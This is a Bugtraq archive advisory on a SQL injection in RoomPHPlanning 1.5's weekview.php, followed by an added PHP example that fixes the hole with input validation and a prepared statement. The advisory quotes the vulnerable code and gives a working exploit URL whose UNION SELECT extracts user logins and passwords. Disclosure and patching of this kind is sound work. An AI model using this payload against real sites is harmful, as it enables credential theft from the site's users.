Bugtraq mailing list archives
RoomPHPlanning 1.5 (weekview.php) SQL Injection Vulnerability
From: hadihadi_zedehal_2006 () yahoo com
Date: 27 May 2008 01:05:53 -0000
#######################################################################################
#                                                                                     #
#   ...::::RoomPHPlanning((weekview.php)) 1.5 SQL Injection Vulnerabilities ::::...   #
#######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discovered by: virangar security team (hadihadi)

special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra & all virangar members & all hackerz

greetz: to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal)
-----
-------vuln codes in:-----------
weekview.php:

@$idroom = $_GET['idroom'];
....
line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ".
"FROM ".ROOM." WHERE IdRm=".$idroom ;
---
exploit:

http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*
---
young iranian h4ck3rz
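An added example, not part of the original advisory and not RoomPHPlanning's own code: one way to close the hole in the idroom handling quoted above, by validating the parameter as a positive integer and binding it in a prepared statement instead of concatenating it into the query. The PDO connection, the in-memory SQLite database (needs the pdo_sqlite extension), the rp_room value for the ROOM constant, the helper names and the sample rows are assumptions made for the demonstration.

```php
<?php
// Added example: hardened replacement for the idroom lookup in weekview.php.
// ROOM's real value is not shown in the advisory; 'rp_room' is hypothetical.
const ROOM = 'rp_room';

// Return idroom as a positive integer, or null when it is anything else
// (missing, an array such as idroom[]=1, or a string carrying SQL).
function parse_room_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Same SELECT as line 47, but the id travels as a bound integer parameter.
function fetch_room(PDO $db, int $idroom): ?array
{
    // ROOM is a code constant, never request data; only the id is bound.
    $stmt = $db->prepare(
        'SELECT NameRm, BkcolRm, FtcolRm FROM ' . ROOM . ' WHERE IdRm = :id'
    );
    $stmt->bindValue(':id', $idroom, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo on an in-memory database with constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . ROOM
    . ' (IdRm INTEGER PRIMARY KEY, NameRm TEXT, BkcolRm TEXT, FtcolRm TEXT)');
$db->exec('INSERT INTO ' . ROOM . " VALUES (1, 'Room A', '#ffffff', '#000000')");

// Constructed inputs: one valid id, then values shaped like the advisory's.
$samples = ['1', '-999/**/union/**/select/**/1,2,3', '1 OR 1=1', '', ['1']];
foreach ($samples as $raw) {
    $id   = parse_room_id($raw);
    $room = $id === null ? null : fetch_room($db, $id);
    printf("%-45s => %s\n", json_encode($raw),
        $room !== null ? $room['NameRm'] : 'rejected or not found');
}
```

Only the first sample reaches the database; the others fail integer validation before any query is built, and the bound parameter would keep them out of the SQL text even if validation were skipped.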